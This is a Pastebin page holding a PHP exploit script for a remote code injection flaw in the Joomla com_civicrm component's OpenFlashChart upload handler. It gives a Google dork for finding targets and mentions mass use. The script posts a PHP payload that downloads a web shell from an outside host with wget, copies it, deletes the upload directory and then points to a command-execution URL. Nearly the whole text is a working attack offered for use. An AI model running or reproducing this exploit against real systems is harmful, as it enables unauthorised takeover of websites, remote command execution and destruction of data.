API tools faq
paste
Advertisement
Kyfx

Joomla component com_civicrm remote code injection vulnerabi

Kyfx
May 4th, 2015
443
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.42 KB | None | 0 0
raw download clone embed print report
  1. # Exploit Title: joomla component com_civicrm remode code injection exploit
  2. # Google Dork:"Index of /joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart"
  3. # Date: 20/04/2013
  4. # Exploit Author: iskorpitx
  5. # Vendor Homepage: http://civicrm.org
  6. # Software Link: http://civicrm.org/blogs/yashodha/announcing-civicrm-422
  7. # Version: [civicrm 4.2.2]
  8. # Tested on: Win8 Pro x64
  9. # CVE : http://www.securityweb.org
  10.  
  11. <?php
  12.  
  13. # Joomla component com_civicrm OpenFlashCart ofc_upload_image.php remote code injection exploit
  14. # http://www.securityweb.org & http://www.security.biz.tr
  15. # multithreading mass c:\appserv\www>exp.php -u http://target.com/ -f post.php
  16.  
  17.  
  18.  
  19. $options = getopt('u:f:');
  20.  
  21. if(!isset($options['u'], $options['f']))
  22. die("\n Usage example: php jnews.php -u http://target.com/ -f post.php\n
  23. -u http://target.com/ The full path to Joomla!
  24. -f post.php The name of the file to create.\n");
  25.  
  26. $url = $options['u'];
  27. $file = $options['f'];
  28.  
  29.  
  30. $shell = "{$url}administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/{$file}";
  31. $url = "{$url}administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name={$file}";
  32.  
  33.  
  34. $data = '<?php
  35. system("wget http://www.securityweb.org/shell.txt; mv shell.txt post.php");
  36. system("cp post.php ../../../../../../../tmp/post.php");
  37. system("cd ..; rm -rf tmp-upload-images");
  38. echo "by iskorpitx" ;
  39. fclose ( $handle );
  40. ?>';
  41. $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
  42. 'Content-Type: text/plain');
  43.  
  44.  
  45. echo " [+] Submitting request to: {$options['u']}\n";
  46.  
  47.  
  48. $handle = curl_init();
  49.  
  50. curl_setopt($handle, CURLOPT_URL, $url);
  51. curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
  52. curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
  53. curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
  54.  
  55. $source = curl_exec($handle);
  56. curl_close($handle);
  57.  
  58.  
  59. if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
  60. {
  61. echo " [+] Exploit completed successfully!\n";
  62. echo " ______________________________________________\n\n {$shell}?cmd=system('id');\n";
  63. }
  64. else
  65. {
  66. die(" [+] Exploit was unsuccessful.\n");
  67. }
  68.  
  69. ?>
  70.  
  71. # 2CF4D1BF882F7547 1337day.com [2013-05-21] C248C940C9C6067B #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!